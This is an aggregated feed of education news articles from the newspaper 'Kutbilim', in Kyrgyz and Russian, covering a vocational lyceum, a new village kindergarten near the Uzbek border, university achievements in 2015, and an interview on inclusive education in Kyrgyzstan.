Жогорудагы Майрамбек, Бекболсун сыяктуу уландар окуп жаткан №5 кесиптик-техникалык лицей куруучулук кесипке окуткан борбор калаабыздагы эки орто окуу жайдын бирөөсү болуп эсептелет. Лицейдин өндүрүш башчысы Айнура Малашеванын айтымында, бул окуу жайда учурда эӊ керектүү жана өтүмдүү болуп жаткан  эмерек жасоочу, куруучу, ширетүүчү сыяктуу адистиктерди даярдап чыгарышат.

- Бул лицейде иштегениме беш жылдан ашты. Бизге 9-классты жана 11-классты аяктаган уландар келишет. Жыл сайын кабыл алуу нормасы толбой калбайт. Айрыкча, ширетүүчү кесибине каалоочулар көп болот, бирок бизде бир эле тайпа бар, андыктан каалоочулардын баарын кабыл ала албайбыз. Ушул муктаждыктарды эске алып, жакынкы келечекте дагы бир тайпа ачууну пландап жатабыз. Тилекке каршы, анын баары эле каражатка такалууда, — дейт А.Малашева.

Жарым кылымга чукул тарыхы бар лицейдин директору Айдаралы Айтмырзаев ушул окуу жайда иштегенине 35 жыл болду. Өзү ушул жерден билим алган. Мастерликтен директорлук кызматка жеткен эмгек жолунда байкаганы, бул кесипке  ээ болгон балдар эч качан жумуш издеп убара болушпайт.

- Биздин окуу жайды жыл сайын 500-600 бала аяктайт. Бирок бизден билим алган балдарга суроо-талап чоӊ болгондуктан, дээрлик баары окуусун аяктаганга чейин эле жумуш менен камсыз болушат. Буга биринчи кезекте келишим түрүндөөндүрүштүк практика учурунда барып иштеген мекеме-ишканалар жардам берет. Мындан тышкары негизги кесиптерден тышкары сантехник, электрик, каменщик сыяктуу кыска мөөнөттүү курстар бар. Анда жогорку билимдүү, бирок шартына байланыштуу квалификациясын өзгөрткүсү келген адамдар адистикке ээ болушат, — дейт директор.

Кесиптик билим берүүнүн кечээкиси

 Башталгыч кесиптик билим берүүнүн башаты өткөн кылымга, тагыраак айтканда, 1920-жылдарга такалат. Совет бийлигинин ошол алгачкы жылдары кабыл алынган декреттин негизинде 18 жаштан 40 жашка чейинки бардык жумушчулар сөзсүз түрдө башталгыч кесиптик-техникалык окуудан өтүүгө милдеттендирилген. Кыргызстанда төрт жумадан сегиз айга чейин окуткан ошондой алгачкы курстар адегенде “Кызыл-Кыя” жана “Сүлүктү” ташкөмүр руднигинде уюштурулган эле.

Кыргызстанда расмий түрдө 1942-жыл – башталгыч кесиптик-техникалык билим берүү уюшулган жыл катары эсептелип келет.

Совет мезгилинде кесиптик билим берүүчү орто окуу жайларынын саны жыл сайын өсүп, борборлордо эле эмес, республикабыздын туш тарабындагы айылдарына жайылган.

Ошентип, убагында гүлдөп-өнгөн КТБ мезгили совет доору менен бирге өткөн чакка айланып, андан бери бир да жаӊы окуу жайлары ачылган эмес. Расмий билдирүүлөр боюнча 90-жылдардын башында кесиптик-билим берүү системасында 122 КТУ иштеп, анда 230 кесип боюнча 60 миӊден ашуун улан-кыз билим алган.

Кесиптик билим берүүнүн келечеги

 Акыркы 20 жылда башка тармактар сыяктуу эле КТБ чоӊөзгөрүүлөргө дуушар болду. Алсак, 1988-жылга чейин кесиптик-техникалык билим берүү боюнча мамлекеттик комитет, 1988-1991-жж. – Элге билим берүү министрлигинин курамындагы кесиптик-техникалык билим берүүнүн окуу-методикалык башкармалыгы, 1991-1994-жж. – Жумушчу кадрларды жана ишкерлерди даярдоо боюнча мамлекеттик комитет, ал эми 1994-жылы Кесиптик-техникалык билим берүүнүн башкы башкармалыгы деп аталса, 2001-жылы Эмгек жана социалдык коргоо министрлигинин алдындагы баштапкы кесиптик билим берүү боюнча башкармалыгы деген статуска ээ болгон.

КР Президентинин Указы менен 2009-жылы КРнын Эмгек, жумуштуулук жана миграция министрлигинин алдындагы Кесиптик-техникалык билим берүү агенттиги болуп түзүлгөн. Билим берүү системасынын бир бөлүгү болгон КТБнын негизги максаты — эмгек рыногунун талабына шайкеш квалификациялуу кадрларды даярдоо болуп эсептелет.

Азыркы күндө КТБ системасында 101 окуу жайы (анын ичинде Токмок индустриалдык-педагогикалык колледж), Жаза аткаруу мамлекеттик кызматынын алдындагы 6 кесиптик окуу жайы жана өндүрүштүк окутуу мастерлерин даярдаган бир колледж бар. Жыл сайын бюджеттик негизде орто эсеп менен алганда 80-90 жакын түрдүү кесиптер боюнча  жумушчу кадрлар даярдалат.

Статистикалык маалыматтар боюнча 2012-жылдын башында окуучулардын саны 32 миӊди түзгөн. Курулуш, айыл чарба, жеӊил өнөр жайы, тамак-аш, тейлөө ж.б. кесиптерге ээ болгон улан-кыздардын 90 пайызга жакыны иш менен камсыз болот. Көбү жогорку окуу жайларында окууларын улантышат.

Ушунча жылдар аралыгында улам бир министрликтин алдында түзүлүп келген КТБ чындыгында Билим берүү жана илим министрлигине кошулса көп утушка ээ болмок деген пикирде болгондор арбын. Алардын бири КРнын Эмгек, миграция жана жаштар министрлигинин алдындагы кесиптик-техникалык билим берүү агенттигинин кадрлар боюнча адиси Алсеит Жусумамбетовдун пикиринче, кесиптик билим берүү системасы билим берүү деп аты айтып тургандай, максаты, багыты бир система болгон соӊ, Билим берүү жана илим министрлигине кошулуп, бирдиктүү болгону туура. Анын айтымында, ошондо окуу китептери менен камсыздоо жагы да, окуу процессинин мазмуну да жакшырмак.

- Кесиптик-техникалык билим берүүчү орто окуу жайларына суроо-талап акыркы жылдары өсүп жатканы байкалууда. Өзгөчө курулуш, жеӊил өнөр жай, айыл чарба, тейлөө кызматтары, тамак-аш, энергетика тармактары боюнча биз даярдаган улан-кыздар өтүмдүү. Мындан тышкары биздин окуу жайларда жумушу жок жүргөн адамдарды даярдоо жана кайра даярдоо багытында жакшы иштер аткарылып жатат.

Биздин орто окуу жайларда окутуунун артыкчылыгы – бардык катмарларга жеткиликтүү. Башкача айтканда, кыска мөөнөттө заманбап бекер билим ала алышат. Каалагандар окууларын андан ары жогорку окуу жайларда улантса болот. Эӊ негизгиси – ишсиз калышпайт, — дейт Алсеит Жусумамбетов.

Айнагүл Кашыбаева, “Кутбилим”

АЛЫСКЫ ЧЕК АРАДАГЫ АЛГАЧКЫ БАЛА БАКЧА

$
0
0

Баткен районундагы Зар-Таш айылынын элинин кубанычында чек жок. Себеби көп жыл кыялданып жетпей келген бала бакчалуу болушту.

Өзбекстан менен чектеш орун алган Зар-Таш айылында 140 түтүн калк жашайт. Чакан айылдын балдары  бала бакча эмне экенин билбей чоӊоюшкан. Эми минтип эки тайпалуу бакчага айылдын барган балдардын кубанычынан айыл эли да кубат алып турган кез.

- Биздин жамааттык бала бакчага учурда 52 бала барып жатат. Азыр бала бакча болуп түптөлгөн имарат  айылдагы каралбай калган эски жай эле. Аны Төрт-Гүл айыл өкмөтү капиталдык ремонттон өткөрүп берди. Билим берүү жана илим министрлиги, Баткен райондук билим берүү бөлүмү туш тараптан колдоо көрсөтүштү. Ал эми “Юнисеф” эл аралык фонду жана «Айжан» коомдук фондунун жардамы менен бөбөктөр үчүн эмерек, телевизор, DVD,  килем, оюнчук, китеп, кеӊсе буюмдары менен камсыздалды, — дейт бала бакчанын башчысы Эмилбек Абдибалиев.

Эки тайпага бөлүнгөн бөбөктөргө бир тарбиячы, бир анын жардамчысы жана медайым кам көрүшөт. Айыл эли балдары күнү кечке атайын адистер тарабынан камкордукка алынып, коопсуз жайда ойноп-күлүп, мектепке чейинки даярдыктан өтүп жаткандыгына  чексиз ыраазы болуп, рахматын айтып бүтө элек. Небереси ушул бакчага бара баштаган Бактыкан Курбанбаева небереси Адилеттин кадимкидей өзгөрүлүп калганын байкады.

- Бала бакчага барууну эӊсеген балдарыбыз аябай кызыгуу менен келип жатышат. Ал жерде ыр-бий үйрөнүшүп, түрдүү оюндарды ойношот. Уккан кызыктуу жомокторун үйгө келгенде айтып бүтө алышпайт. Менин неберем Адилет азыр алты жашта. Бакчага бара баштаганы аябай өзгөрдү. Маселен, колун айттырбай жууп, кадимкидей тартипке келип калды. Эртеӊ менен бакчасына ашыгып барат, — дейт кубанычын жашыра албаган чоӊ эне.

Бала бакчадагы  биринчи агай

Зар-Таш айылындагы бала бакчанын башчысы Эмилбек Абдибалиев жаш жетекчилердин бири. Жаш эле эмес, Кыргызстандагы бала бакчаларды жетектеген эркек агай жетекчи десек да болот. Кесиби филолог мугалим Эмилбек Абдибаитович буга чейин Ош гуманитардык-педагогикалык институтунда эмгектенген. Үй-бүлөлүк шартына байланыштуу айылга көчүп барып, айылдан өзүнө ылайыктуу жумуш таппай жүргөндө, минтип өзүнө жаккан иш менен алектенип жатканына сыймыктанат.

- Өзүм балдар менен иштегенди аябай жакшы көрөм. Мен балдарга сабак өткөндү, аларга жаӊы нерселерди үйрөткөндү бала кезден кыялданчумун. Бөбөктөрдүн жан дүйнөсүнөүӊүлүп кирип, алардын кызыктуу кыялы менен бөлүшүү кандай кызыктуу. Айылга көчүп келгенден кийин мектепте иштесемби деп пландаштырып жаттым эле. Анан ушундай бала бакча ачылып, ага башчы издеп жатышканын угуп калдым. Айылдын жаштары, айыл башчысы менин талапкерлигимди сунуштап, ал сунушту  Юнисеф эл аралык фондунун Баткен облусу боюнча координатору Ч.Ахмедова, Баткен райондук билим берүү  бөлүмүнүн башчысы А.Зайитов, Төрт-Гүл айыл өкмөтүнүн башчысы Н.Артыковдор колдошту. Алардын ишенимин актаганга аракеттенип, чын дилимден иштегенге кириштим. Себеби, балдарыбыз жаӊыча сабакка, сапаттуу билимге, татыктуу тарбияга, көкүрөк толгон мээримге муктаж. Мына ушул муктаждыктарды аз болсо да орундатууга аракет жасасак. Балдар бакчасында башчы болуп иштеген жалгыз агай директор экенмин. Мен ушул жерде иштегениме сыймыктанам, — дейт Эмилбек Абдибалиев.

Тарбиячыларга “Чоӊ эне жомогу” жана “Аталар” уюму жардамдашат

Мурда чоӊ энелерибиз балдарды жомок менен таасирлүү тарбиялашчу эмес беле. Азыр ушул нерсе солгундап кеткендей. Кичинекейлерге жомок айтууну жандандыруу сунушу менен айылдын чоӊ энелерине кайрылышканда, алар жан дили менен макул болушту. Энелер жомок аркылуу  балдарды бир чети адеп-ахлакка тарбиялап, ой жүгүртүүсүн өркүндөтүүгөөз  салымдарын кошсо, экинчи жагынан өздөрүнө да эрмек табылды. Интернет булактарынан кызыктуу китептерди издеп табууга энелерге жардамчылар көп. Балдарды тарбиялоого көӊүл буруп, тарбиячыларга көмөктөшүүгө энелерден тышкары аталарды да активдүү тартышууда. Ал үчүн атайын “Аталар” уюмун түзүштү.

- Азыркы учурда балдарга таалим-тарбия берүүдө атанын ролу азайып баратканы жашыруун эмес. Көпчүлүгү алыскы жана жакынкы чет өлкөлөрдө. Үйдө жүргөндөр деле таӊ заардан кечке дейре жумушта. Башкача айтканда, балдары менен ойноого, сүйлөшүүгө, эркелетүүгө көп убакыт бөлө алышпайт. Ата-энелер чогулушуна чакырсак, 90 пайыз апа келет. Балдардын тарбиясында эненин орду чоӊ, бирок, ошол эле мезгилде, аталар да кызыкдар болуш керек. Биз жаш курактагы балдарга аталардын да көбүрөөк көӊүл буруусун каалап, «Аталар» уюмун түздүк.  Уюмга мүчө болгон аталар менен жума сайын жолугушуу өткөрүп, балдарды тарбиялоодогу көӊүл буруучу маселелерди талкуулайбыз.  Алар                                                                                                                                           мындан сырткары балдар бакчасындагы курулуш, жасалгалоо иштерине жардам берип турушат. Жаз алды менен балдар бакчасынын айланасына бир топ көрктөндүрүү иштерин пландап жатабыз, — дейт директор мырза.

Зар-Таш айылындагы мектеп жашына чейинки бөбөктөр буга чейин көчөдө убакыт өткөрүшчү. Аларга атайын көӊүл бөлгөн иш-чаралар дээрлик жок эле. Азыр болсо бала бакчага барып бир тартипке келип калган балдардын бири-бирине жасаган достук мамилелерин, жүздөрүндөгү жылмаюуларын көрүшкөн тарбиячылар эле эмес, айыл эли да алардын кубанычына теӊ ортоктош болуп, бала бакчанын иши токтобой, андан ары уланышы үчүн колдон келген көмөктөрүн көрсөтүүгө ынтызар экендигин билдиришүүдө.

Айнагүл Кашыбаева, “Кутбилим”

 


ЖОЖ: жыл ичиндеги ийгиликтер жана жетишкендиктер

$
0
0

Өтүп бара жаткан кой жылы республиканын жогорку окуу жайларына дагы  көптөгөн ийгиликтерди алып келди. Окуу жайлардын баардыгы жаӊыча кредиттик технологияда билим берүү, долбоорлор аркылуу илимий-изилдөө иштерин өркүндөтүү, улуттук жана жалпы адамзаттык маданий баалуулуктар менен  жаштарды тарбиялоо, окуу процессин маалыматтык жаӊы технологиялар менен жабдуу багытында олуттуу жана салмактуу иштерди  аткарышты.

Быйылкы жогорку окуу жайларындагы эӊ чоӊ окуя деп жетекчилердин кайрадан шайланышын айтсак болот. 2015-жылы Кыргыз мамлекеттик юридикалык академиясында, Кыргыз мамлекеттик техникалык университетинде, Ош техникалык университетинде, Ысык-Көл мамлекеттик университетинде, И.Арабаев атындагы Кыргыз мамлекеттик университетинде, Кыргыз мамлекеттик дене тарбия жана спорт академиясында, Баткен мамлекеттик университетинде, Кыргыз улуттук консерваторияда жана Мамлекеттик көркөм академияда жетекчилик орунга шайлоо өткөрүлдү. Жетекчиликке ат салышкан талапкерлердин эмгек жамааттын ишеничине көбүрөөк ээ болуп, эӊ көп добуш алган жетекчи Кыргыз мамлекеттик юридикалык академиянын ректору Канат Керезбеков. Ал шайлоодо 96% добуш алып, кайрадан ректорлукка дайындалды. Экинчи орунга И.Арабаев атындагы Кыргыз мамлекеттик университетинин ректору чыкты, ал эмгек жамааттын 86% добушун алып, жетекчилик кызматка кайрадан дайындалды.

Жаӊы курулуштар

Кой жылында мурунку жылдагыдай эле окуу жайдын  инфраструктурасын жакшыртууга көӊүл бөлгөн Ош мамлекеттик университети болду.  Окуу жайда бир жылда эки окуу корпусу пайдаланууга берилсе, эки окуу корпусунун курулушу башталды. Окуу жылынын башында Өзгөн медициналык колледжи жаӊы сатылып алынган, заманбап технологиялар, лабораториялык каражаттар менен камсыз болгон окуу имаратына көчсө, Финансы юридикалык  колледжи дагы октябрь айында жаӊы корпуска ээ болду. Имарат зарыл эмеректер менен жабдылып, 22 аудиторияга кеӊейтилди. Ак-Буура кампусунда төрт кабаттуу эл аралык медицина факультетинин окуу имараты курула баштады. ОшМУ сентябрь айында медицина факультетине төрт кабаттуу административдик окуу имаратынын курулушун баштады. Бул имараттарды куруу университеттин ички булактарынын эсебинен каржыланууда.

Быйыл токсон жылдыгын ийгиликтүүөткөргөн Ош гуманитардык педагогикалык институту дагы юбилейге карата жаӊы окуу имаратын куруп бүтүп, пайдаланууга берди. Республиканын борборунда жайгашып, он миӊден ашуун студенти бар окуу жайлар курбаган имаратты бул окуу жайы  ички каражатынын эсебинен курду.

Бул жылы Борбордук Азиядагы Америка университети дагы жаӊы имаратка көчтү. Аталган окуу жайдын буга чейин өзүнүн имараты болгон эмес.

Бишкек гуманитардык университети болсо  Япониянын өкмөтү бөлгөн гранттын эсебинен башкы корпусунун 3-кабатын толук ремонттон өткөрүп алды.

Эмгек акы жогорулаган окуу жайлар

Өтүп бара жаткан жылда бир катар окуу жайлар эмгек жамааттын эмгек акысын жогорулатууга жетишти. И.Арабаев атындагы Кыргыз мамлекеттик университети профессордук-окутуучулук курамдын эмгек акысына үч миӊ сомдон, докторлук диссертациясын жактагандарга 60 миӊ сомдон, кандидаттык диссертациясын жактагандарга 30 миӊ сомдон төлөп бере баштады. Ош мамлекеттик университетинин дагы окутуучулары ноябрь айынан тарта 50% жогорулатылган эмгек акы алышууда.

Жаӊы ачылыштар

Кыргыз улуттук агрардык университети быйыл башка окуу жайлардан жаӊы илимий лабораторияларды көп ачкандыгы менен айырмалана алды.   Окуу жай Эл аралык айыл чарбасын өнүктүрүү фондусунун (IFAT)  долбоору  аркылуу 430 миӊ долларга  заманбап илимий ветеринардык лабораториялык жабдыктарды, приборлорду, аспаптарды жана диагностикалык куралдарды алды. Топурактын, суунун сапаттык касиеттерин изилдөөүчүн Кыргыз-Кытай илимий-изилдөө лабораториясы, «Кыргыз Республикасында органикалык дыйканчылыкты таркатуу»  долбоорунун алкагында Япониялык эл аралык катнашуу агенттиги тарабынан “Топурак таануу-агрохимия” лабораториясы ачылып,  жаратылыш ресурстарын башкаруу факультетинин окуу лабораториясы болгон “Суу музейи” кайрадан ишке киргизилди.

Кыргыз мамлекеттик курулуш, транспорт жана архитектура университетинде болсо жыл жаӊырар алдында “Жаӊы Жибек Жолу” Кыргыз-Кытай эл аралык институту ачылып, Кытай тарап он студентти акысыз окутуп берүү милдетин өз мойнуна алды.

Сапат сыйлыгынын ээлери

КР Өкмөтүнүн “Сапат” сыйлыгын быйыл Муса Рыскулбеков атындагы Кыргыз экономикалык университети жеӊип алды. Ал эми “Сапат” боюнча сыйлыктын дипломанты катары Ош мамлекеттик университети, Кыргыз мамлекеттик курулуш, транспорт жана архитектура университети, Жусуп Баласагын атындагы Кыргыз улуттук университетине караштуу Башкаруу жана бизнес институту жана Кусеин Көлбаев атындагы Бишкек авто-жол колледжи таанылды.

Сапат үчүн күрөшкөндөр

Кыргыз мамлекеттик курулуш, транспорт жана архитектура университети быйыл эки программа боюнча эл аралык аттестациядан ийгиликтүүөтүп, Европанын сертификатын алды.

Ысык-Көл мамлекеттик университети болсо эл аралык байланышын чыӊдоодо алгылыктуу ийгиликтерди жаратты. Учурда ТЕМПУС программасы боюнча жети эл аралык долбоор, Эрасмус Мундус долбоору боюнча эки долбоор, Норвегиянын  билим берүү агенттигинин эки долбоору, Мевлана долбоору боюнча эки протокол, Эл аралык илимий-техникалык борбордун бир долбоору, Конфуций борборун колдоо боюнча Конфуций институтунун  бир долбоору, Кыргыз-Араб борборунун өнүгүүсү боюнча бир долбоор иштеди.

Табылгалар

Быйыл жогорку окуу жайларынын профессордук-окутуучулук курамы дагы жигердүү иштеп, алгылыктуу ийгиликтерди жаратышты. Жалал-Абад мамлекеттик университетинин окутуучулары: Карбекова Азиза  жана Эрназарова Бактыгүл Түштүк Кореянын Сеул шаарында өткөн эл аралык  аялдардын “Экспозиция — 2015”  форумунда үч патентти көргөзмөгө коюп, жыйынтыгында бир алтын, бир күмүш, бир коло медаль менен кайтышты.  Ушул эле окуу жайдын доценти  Б. Эрназарова  Кыргызпатент тарабынан уюштурулган  “Ярмарка идей” конкурсунда 1-орунду алып, акчалай сыйлыкка ээ болду.

Чолпон Кийизбаева, “Кутбилим”

Салтанат МАМБЕТОВА: «Инклюзивное образование – это внимание, участие и сопереживание к каждому ребенку»

$
0
0

Министерство образования и науки КР уже много лет работает над внедрением в Кыргызстане инклюзивного образования в школах. Это направлено на обеспечение права каждого ребенка на образование, на повышение доступности образования для маленьких кыргызстанцев вне зависимости от их индивидуальных потребностей, которые возникают  в связи с различными обстоятельствами. Главный специалист Управления внешкольного, дошкольного и школьного образования Салтанат МАМБЕТОВА рассказала газете «Кутбилим» о существующих проблемах и определенных достижениях при внедрении в Кыргызстане инклюзивного образования.

- Многие наши читатели не знают, что такое инклюзивное образование….

- Инклюзивное образование – это обеспечение равного доступа к образованию для всех обучающихся с учетом разнообразия особых образовательных потребностей и индивидуальных возможностей. Это такой процесс обучения и воспитания, при котором ВСЕ дети, вне зависимости от их физических, психических, интеллектуальных и иных особенностей, включены в общую систему образования и обучаются по месту жительства вместе со своими сверстниками без инвалидности в одних и тех же общеобразовательных школах, которые учитывают их особые образовательные потребности и оказывают необходимую специальную поддержку.

Инклюзивное обучение детей с особенностями развития совместно с их сверстниками – это обучение разных детей в одном классе, а не в специально выделенной группе при общеобразовательной школе.

Хотелось бы  подчеркнуть, что обычно бытует мнение, что инклюзивное образование направлено только на детей с ограниченными возможностями здоровья. Но это не так. Инклюзивное образование охватывает многие категории детей, которые по тем или иным причинам не обеспечены полноценным  доступом к образованию. Это и дети, которые по семейным обстоятельствам вынуждены работать, что уже говорит о неполноценном образовании, это и дети, у кого имелся или был перерыв в получении образования. Это дети и внутренних и внешних мигрантов – к ним тоже требуется особый подход в связи с переходом их из школы в школу. Словом, инклюзивное образование охватывает ряд различных категорий. Инклюзивное образование – это внимание, участие и сопереживание к каждому ребенку.

- Сколько в Кыргызстане  детей с ограниченными возможностями здоровья, которые имеют полноценный доступ к образованию?

- По данным Министерства социального развития КР, сегодня в республике проживают 23 567 детей с ограниченными возможностями в возрасте от 0 до 18 лет. Их них: 4 133 ребенка имеют нарушения опорно-двигательного аппарата. В настоящее время в 15 специальных школах-интернатах и в 4 специальных общеобразовательных школах 2 937 детей; в 14 специальных детских садах для детей с ограниченными возможностями здоровья – 1536 детей.

В настоящее время, доступ к образованию, я имею ввиду и дошкольное и школьное виды образования имеют 10 тысяч 925 детей с ограниченными возможностями здоровья, что составляет 46,4% от общего количества. Из них в 673 общеобразовательных  школах  программами инклюзивного образования охвачены более 4 050 детей школьного и 2 268 детей  -  дошкольного возраста. Анализ количественного состава учащихся специальных образовательных организаций за последние 4 года показывает увеличение количества детей на 1-1,5% ежегодно, что в дальнейшем может привести к увеличению финансирования со стороны государства на улучшение условий обучения и предоставления технических средств.

В 673 общеобразовательных  школах  программами инклюзивного образования охвачены более 4 050 детей школьного и 2 268 детей  -  дошкольного возраста.

- Какие мероприятия проведены в рамках проекта  Минобразования КР  и Азиатского Банка Развития по инклюзивному образованию?

- В рамках проекта  Минобразования КР  и Азиатского Банка Развития по инклюзивному образованию «Повышение доступа к качественному основному образованию для детей с особыми потребностями” при технической поддержке Японского фонда по сокращению бедности было разработано руководство “Инклюзивное образование в высшей школе”. Также введен курс “Инклюзивное образование” в учебные планы пилотных вузов по педагогическим специальностям, разработан куррикулум для учащихся 1-4 классов специальных школ для детей с нарушениями психофизического развития, который в данный момент находится на стадии апробации.

Кроме того были созданы 7 психолого-медико-педагогических консультаций для выявления и направления детей в общеобразовательные школы в пилотных районах. При поддержке Фонда Евразия в Центральной Азии разработаны пакеты методических пособий для родителей по работе с детьми, имеющим ограниченные возможности здоровья. В этих же годах было разработано методическое пособие по работе с детьми с ОВЗ в условиях массовой дошкольной организации. В рамках пилота, в нескольких школах Чуйской области организованы и успешно функционируют Клубы для детей с ОВЗ.

- С какими проблемами сталкивается Минобразования КР при внедрении инклюзивного образования в школах?

- В этой ситуации, есть определенные проблемы, требующие безотлагательного решения. В первую очередь, это неприспособленность большинства школ для пребывания в них детей с ограниченными возможностями здоровья. Другая и пожалуй главная проблема это неготовность общества, в том числе родителей, к тому, что здоровые дети и дети с ОВЗ обучаются совместно.

Определенную трудность создает отсутствие специальных учебников и методических пособий, что негативно сказывается на самом процессе обучения. На данный момент в специальных школах используются учебники, выпущенные в 90-х годах в Российской Федерации.

Отрадно то, что государство активно внедряет политику инклюзивного образования и инклюзивного общества. Так, основное направление развития инклюзивного образования заложены в стратегических документах развития системы образования. Например, в Стратегии развития образования на 2012-2020 годы в качестве первого трехлетнего плана реализации на 2012-2014 годы включены вопросы по разработке норматива оснащения инклюзивных и специальных общеобразовательных школ учебными материалами, пособиями, оборудованием к 2014 году, по разработке совместно с заинтересованными министерствами и ведомствами, новых требований к проектно-сметной документации по строительству зданий для всех уровней образования. Здесь нужно предусмотреть обучение  в них детей с ограниченными возможностями здоровья (пандусы и т.п.).

Согласно Концепции развития образования в Кыргызстане до 2020 года, в структуре системы образования 2020 года включен вопрос интеграции инклюзивного образования на всех уровнях образования, при сохранении специализированных школ для детей с ограниченными возможностями здоровья.

По нашим расчетам к 2020 году, система образования позволит обеспечивать гарантированный доступ к качественному основному общему  образованию и равный доступ к другим уровням образования в зависимости от способностей и потребностей каждого человека. Включать инклюзивные подходы к обучению на всех ступенях образования, с акцентом на образование детей с особыми нуждами и детей с ограниченными возможностями здоровья.

- Что нужно предпринять для решения имеющихся проблем?

- В  первую очередь, это проведение информационных компаний, направленных на преодоление стереотипов, имеющихся в общественном мнении. Нужна подготовка преподавателей, способных и готовых работать в инклюзивных школах, нужно создание инфраструктуры, обеспечивающей потребности детей с особыми нуждами. Также нужна разработка и издание УМК для учащихся специальных образовательных организаций для детей с ОВЗ.

В настоящее время Минобразования КР ведет работу по созданию рабочих групп для разработки учебников для 1-х классов специальных школ для умственно отсталых детей.

- В плане международного сотрудничества, что будет сделано для внедрения инклюзивного образования?

- Членами рабочей группы Совета по образованию при ИК ЕврАзЭс по сотрудничеству в области инклюзивного образования, утвержденных приказом МОиНКР, рассмотрен проект Соглашения  о сотрудничестве государств-членов Евразийского экономического сообщества в сфере инклюзивного образования.

Особое внимание привлекает тот факт, что на основании данного Соглашения появляется уникальная возможность в повышении квалификации педагогических кадров, занимающихся вопросам инклюзивного образования. Не секрет, что до настоящего времени работа в данном направлении не велась, отсутствует финансирование расходов, связанных с выездом специалистов в страны дальнего и ближнего зарубежья.

Это Соглашение позволит нам ознакомиться с передовым опытом государств-участников, а также поделиться своими знаниями. Примечательно то, что согласно Соглашению, стороны содействуют совместной разработке и изданию учебной и учебно-методической литературы в сфере инклюзивного образования. В нашей стране, при обучении детей с ограниченными возможностями здоровья, к сожалению, используются учебники 90-х годов, которые устарели как морально, так и физически. Слабый потенциал, отсутствие бюджетных средств, низкая информированность педагогических работников о мировом передовом опыте, отбросило на несколько лет назад вопрос разработки специальных учебников и учебно-методических материалов.

Возможно, при разработке учебников могут возникнуть трудности, связанные со спецификой национальных образовательных систем, учебной нагрузки и особенностях подхода к детям с ограниченными возможностями здоровья в зависимости от сферы нарушения.

Перечень индикаторов по инклюзивному образованию носит разносторонний характер, и позволит проводить мониторинг доступа к образованию детей и лиц, имеющих ограниченные возможности здоровья.

Отрадно то, что в рамках данного Документа государства прилагают усилия для создания условий для включения каждого ребенка в образовательный процесс, исключая любую форму сегрегации, и подходят к единому пониманию инклюзивного образования как права каждого ребенка на развитие своего потенциала. Это находит все большее понимание и будет продолжать осуществляться в дальнейшем, чтобы обеспечить каждому ребенку возможность будущей достойной  жизни.

- На Ваш взгляд, что из себя будет представлять инклюзивное образование в будущем?

-   В будущем мы рассчитываем на ряд успехов в этой области. Мы работаем в нескольких направлениях. В частности, речь идет о налаженной координации действий в отношении инклюзивной политики в области здравоохранения, образования и социального обеспечения. Это позволит социальному обеспечению выступать для инклюзивных детей в качестве стимулирующего фактора для получения образования и трудоустройства, а школам уделять большее внимание вопросам инклюзивного образования и подготовки детей с особыми потребностями к жизни в обществе.

Планируется обучение должностных лиц вопросам планирования и осуществления специального обучения через инклюзивные подходы, пониманию инклюзии как части Образования для всех, нацеленного на реализацию для каждого ребенка его конституционного права на получение качественного образования

Будет налажено сотрудничество государственного сектора, родителей и гражданского общества в продвижении инклюзивного образования, в том числе – создание среды, доброжелательной к детям.

Будет проводиться подготовка преподавателей, способных и готовых работать в инклюзивных школах

Планируется создание инфраструктуры, обеспечивающей потребности детей с особыми нуждами, как я говорила выше, планируется проведение информационных компаний, направленных на преодоление стереотипов, имеющихся в общественном мнении.

- Насколько скоординирована сейчас работа ключевых министерств и ведомств, а также неправительственного сектора в области инклюзивного образования? И насколько такая координация и слаженность действий может помочь решить проблемные вопросы?

- Позиция педагогов в условиях инклюзивного образования меняется. Школа утрачивает свою автономность и работает в рамках тесного сотрудничества с логопедами, социальными работниками, врачами с родителями. В своей деятельности педагоги становятся открытыми, они должны демонстрировать свой опыт названным категориям в течение длительного времени. Система здравоохранения, социальные службы, родительские сообщества сегодня активно сотрудничают со школой в вопросах профилактики, здоровьесберегающих технологий, организации доступной среды, соблюдении прав детей.

Например, в 2014 году совместными усилиями МОН и МСР, при поддержке неправительствой организации было открыто учебное отделение в психоневрологическом детском доме, чтобы дети могли получать, хоть и специальное, но образование. При поддержке органов местного самоуправления и софинансирования международной организации в 28 общеобразовательных организациях республики улучшены условия материально-технической базы для приема в школу детей с нарушениями опорно-двигательного аппарата.

Также Минобразования КР разработало и утвердило Минимальный стандарт доступности школьного образования для детей с ограниченными возможностями здоровья. В Минимальных стандартах отражены требования к материально-технической базе и учебным материалам, которые позволят создать оптимальные условия обучения и воспитания детей школьного возраста, имеющих  ограниченные возможности здоровья. При разработке Минимального стандарта были использованы нормативные документы Межгосударственных строительных норм Государственной архитектурной инспекции при Правительстве КР и нормативные правовые акты, регламентирующие вопросы обучения и воспитания детей с ограниченными возможностями здоровья в Кыргызстане.

- Насколько актуальны и востребованы службы психолого-медико-педагогического сопровождения, которые создаются сейчас в трех плотных школах в рамках проекта Фонда Евразия Центральной Азии?

- За предыдущие годы в рамках различных проектов уже были внедрены элементы сопровождения детей с ОВЗ, такие как, развитие психолого-педагогической компетентности педагогов в вопросах инклюзии, учащихся, родителей. Сегодня  ребенку с ограниченными возможностями  необходимы такие виды помощи и поддержки, которые обеспечат его развитие в условиях образовательного процесса, и будут представлять собой целостную, системно организованную деятельность специалистов. В Стратегии программы социального развития на 2015-2017 гг. запланировано создание 3-х пилотных Служб Психолого-медико-педагогического сопровождения. Служба сопровождения создаст социально-психологические и педагогические условия для успешного обучения и  развития каждого ребенка в соответствии с его возможностями и потребностями в условиях массовой школы. При финансовой поддержке Фонда-Сорос Кыргызстан в рамках проекта Фонда Евразия Центральной Азии на базе 3-х школ(№18 г. Ош, №8 Нарын, школа-гимназия №1 с. Лебединовка) были открыты службы сопровождения.

Айнура КАНИМЕТОВА «Кутбилим»

Тарых жана маданият жылы: РУХАНИЙ КАЙРА ЖАРАЛУУ МЕЗГИЛИ

$
0
0

Кыргыз Республикасынын Президенти Алмазбек Атамбаевдин жарлыгы менен  2016-жыл “Тарых жана маданият жылы” деп жарыяланды. 

 

 

